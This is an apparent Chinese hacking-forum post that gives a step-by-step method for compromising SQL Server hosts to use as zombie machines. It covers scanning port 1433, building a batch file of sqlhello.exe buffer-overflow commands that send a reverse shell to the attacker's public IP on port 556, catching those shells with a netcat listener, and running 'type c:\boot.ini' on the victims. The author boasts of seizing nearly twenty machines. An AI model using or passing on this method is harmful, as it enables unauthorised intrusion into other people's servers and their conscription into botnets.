SQL Server溢出猎捕肉鸡新方法 |
我今天用这个方法拿到了近20台肉鸡。呵!! 要用到几个工具!! nc.exe sqlhello.exe 代理猎手!! 先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。 扫到后整理。导出。 替换为溢出的格式!!比如我扫到了。 192.168.0.1:1433 溢出的格式就是: sqlhello.exe 192.168.0.1 1433 本机IP(公网的) 556 保存为bat文件。 先在公网的机子上监听一个端口 如556 现在运行那个bat文件! 呵!!看着有没有shell返回。 我试过不到两分钟就返回了一个。 这时候你先ctrl+c 停下那个bat 的运行。 查看一下。那个shell的系统再说! type c:\boot.ini 如果是2003服务器版的。 呵。。 很快的就成为我们的肉鸡了! |